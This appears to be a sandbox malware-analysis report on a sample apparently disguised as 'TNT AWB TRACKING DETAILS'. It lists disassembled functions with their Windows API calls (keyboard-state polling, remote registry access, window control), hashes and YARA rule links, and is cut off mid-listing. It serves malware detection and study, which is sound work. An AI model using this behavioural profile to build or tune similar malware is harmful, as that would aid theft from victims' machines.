                                      • Opcode ID: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                      • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                      • Opcode Fuzzy Hash: aa00afaeb95d016149156b33273ce501c4b0800cd775f7336c4c4d99d01e60ec
                                      • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                      Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetKeyboardState.USER32(?), ref: 00453CE0
                                      • SetKeyboardState.USER32(?), ref: 00453D3B
                                      • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                      • GetKeyState.USER32(000000A0), ref: 00453D75
                                      • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                      • GetKeyState.USER32(000000A1), ref: 00453DB5
                                      • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                      • GetKeyState.USER32(00000011), ref: 00453DEF
                                      • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                      • GetKeyState.USER32(00000012), ref: 00453E26
                                      • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                      • GetKeyState.USER32(0000005B), ref: 00453E5D
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: State$Async$Keyboard
                                      • String ID:
                                      • API String ID: 541375521-0
                                      • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                      • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                      • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                      • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                      Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                      • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                      • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                      • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                      • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                      • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                      • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                      • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                      • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                      • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                      • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$ItemMoveRect$Invalidate
                                      • String ID:
                                      • API String ID: 3096461208-0
                                      • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                      • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                      • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                      • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
                                      Function 004714D9 Relevance: 18.1, APIs: 12, Instructions: 132windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowLongW.USER32(?,000000F0), ref: 004714DC
                                      • LoadImageW.USER32(00000000,?,00000000,00000000,00000000,00002010), ref: 004714F7
                                      • SendMessageW.USER32(?,000000F7,00000000,00000000), ref: 00471510
                                      • DeleteObject.GDI32(?), ref: 0047151E
                                      • DestroyIcon.USER32(?,?,000000F7,00000000,00000000,?,000000F0), ref: 0047152C
                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00002010), ref: 0047156F
                                      • SendMessageW.USER32(?,000000F7,00000001,00000000), ref: 00471588
                                      • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004715A9
                                      • DestroyIcon.USER32(?,?,?,?,?,?,000000F0), ref: 004715CD
                                      • SendMessageW.USER32(?,000000F7,00000001,?), ref: 004715DC
                                      • DeleteObject.GDI32(?), ref: 004715EA
                                      • DestroyIcon.USER32(?,?,000000F7,00000001,?,?,?,?,?,?,000000F0), ref: 004715F8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Icon$DestroyMessageSend$DeleteImageLoadObject$ExtractLongWindow
                                      • String ID:
                                      • API String ID: 3218148540-0
                                      • Opcode ID: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                      • Instruction ID: 6a50b90733f0312424b7b906018c15bc054940e4c1588362709ca6bab20dc4d5
                                      • Opcode Fuzzy Hash: 09c61f0bb0da2772a57e209ce6a73de2c43359248684d71e73f4e5cafd481585
                                      • Instruction Fuzzy Hash: D2419231740206ABDB209F69DD49FEB77A8EB84711F10452AFA46E72D0DBB4E805C768
                                      Function 00433784 Relevance: 18.1, APIs: 12, Instructions: 119COMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                      • String ID:
                                      • API String ID: 136442275-0
                                      • Opcode ID: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                      • Instruction ID: 55d98b2249b58b9b89d53d2d63704957c70a659fb5fc0040d5683289e7d9fa4f
                                      • Opcode Fuzzy Hash: 6cac6aaee55c93d52b89e688f8fbcd2468be5ec8bb4ca81dd5968faf06821e55
                                      • Instruction Fuzzy Hash: C24174B381021C66CB24EB55CC41DEE737DAB98705F0085DEB60963141EA796BC8CFA5
                                      Function 00467408 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 308COMMON
                                      Download Yara Rule
                                      APIs
                                      • _wcsncpy.LIBCMT ref: 00467490
                                      • _wcsncpy.LIBCMT ref: 004674BC
                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                      • _wcstok.LIBCMT ref: 004674FF
                                        • Part of subcall function 00413EB8: __getptd.LIBCMT ref: 00413EBE
                                      • _wcstok.LIBCMT ref: 004675B2
                                      • GetOpenFileNameW.COMDLG32(00000058), ref: 00467774
                                      • _wcslen.LIBCMT ref: 00467793
                                      • _wcscpy.LIBCMT ref: 00467641
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      • _wcslen.LIBCMT ref: 004677BD
                                      • GetSaveFileNameW.COMDLG32(00000058), ref: 00467807
                                        • Part of subcall function 00461465: _memmove.LIBCMT ref: 004614F8
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcslen$FileName_memmove_wcscpy_wcsncpy_wcstok$OpenSave__getptd
                                      • String ID: X
                                      • API String ID: 3104067586-3081909835
                                      • Opcode ID: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                      • Instruction ID: 683e1e2944aeccc99b179fad4e52216d38d827d7da526ed866e93360804c4864
                                      • Opcode Fuzzy Hash: bae8ec41c075a4f6a2b7e9f416d910fa80a531229cf5203f8bd385032f306646
                                      • Instruction Fuzzy Hash: 69C1C5306083009BD310FF65C985A5FB7E4AF84318F108D2EF559972A2EB78ED45CB9A
                                      Function 00461014 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetClassNameW.USER32(?,?,00000400), ref: 00461056
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 00461092
                                      • _wcslen.LIBCMT ref: 004610A3
                                      • CharUpperBuffW.USER32(?,00000000), ref: 004610B1
                                      • GetClassNameW.USER32(?,?,00000400), ref: 00461124
                                      • GetWindowTextW.USER32(?,?,00000400), ref: 0046115D
                                      • GetClassNameW.USER32(?,?,00000400), ref: 004611A1
                                      • GetClassNameW.USER32(?,?,00000400), ref: 004611D9
                                      • GetWindowRect.USER32(?,?), ref: 00461248
                                        • Part of subcall function 00436299: _memmove.LIBCMT ref: 004362D9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ClassName$Window$Text$BuffCharRectUpper_memmove_wcslen
                                      • String ID: ThumbnailClass
                                      • API String ID: 4136854206-1241985126
                                      • Opcode ID: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                      • Instruction ID: 9bdbaadfe46dce382da1609a4111f175dadd43cf518d3c7fb815d390e9d71813
                                      • Opcode Fuzzy Hash: d083942efa6e299b81e87f64ddc190b4296276633e8192dbc1e7cc466e4535cb
                                      • Instruction Fuzzy Hash: D991F3715043009FCB14DF51C881BAB77A8EF89719F08895FFD84A6252E738E946CBA7
                                      Function 004718BA Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 147windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 004718C7
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00471922
                                      • SendMessageW.USER32(?,00001109,00000000,00000000), ref: 00471947
                                      • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?), ref: 00471960
                                      • SendMessageW.USER32(?,0000113E,00000000,?), ref: 004719E0
                                      • SendMessageW.USER32(?,0000113F,00000000,00000032), ref: 00471A0D
                                      • GetClientRect.USER32(?,?), ref: 00471A1A
                                      • RedrawWindow.USER32(?,?,00000000,00000000), ref: 00471A29
                                      • DestroyIcon.USER32(?), ref: 00471AF4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                      • String ID: 2
                                      • API String ID: 1331449709-450215437
                                      • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                      • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                      • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                      • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                      Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                        • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                        • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                      • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                      • __swprintf.LIBCMT ref: 00460915
                                      • __swprintf.LIBCMT ref: 0046092D
                                      • _wprintf.LIBCMT ref: 004609E1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                      • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                      • API String ID: 3054410614-2561132961
                                      • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                      • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                      • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                      • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                      Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                        • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                      • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                      • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                      • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                      • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                      • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                      • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                      • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                      • API String ID: 600699880-22481851
                                      • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                      • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                      • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                      • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                      Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: DestroyWindow
                                      • String ID: static
                                      • API String ID: 3375834691-2160076837
                                      • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                      • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                      • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                      • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                      Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                      • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                      • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: ErrorMode$DriveType
                                      • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                      • API String ID: 2907320926-3566645568
                                      • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                      • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                      • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                      • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                      Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                      • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                      • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                      • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                      • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                      • DeleteObject.GDI32(00700000), ref: 00470A04
                                      • DestroyIcon.USER32(00550000), ref: 00470A1C
                                      • DeleteObject.GDI32(EE5453E2), ref: 00470A34
                                      • DestroyWindow.USER32(005C0061), ref: 00470A4C
                                      • DestroyIcon.USER32(?), ref: 00470A73
                                      • DestroyIcon.USER32(?), ref: 00470A81
                                      • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                      • String ID:
                                      • API String ID: 1237572874-0
                                      • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                      • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                      • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                      • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                      Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                      • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                      • VariantInit.OLEAUT32(?), ref: 004793E1
                                      • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                      • VariantCopy.OLEAUT32(?,?), ref: 00479461
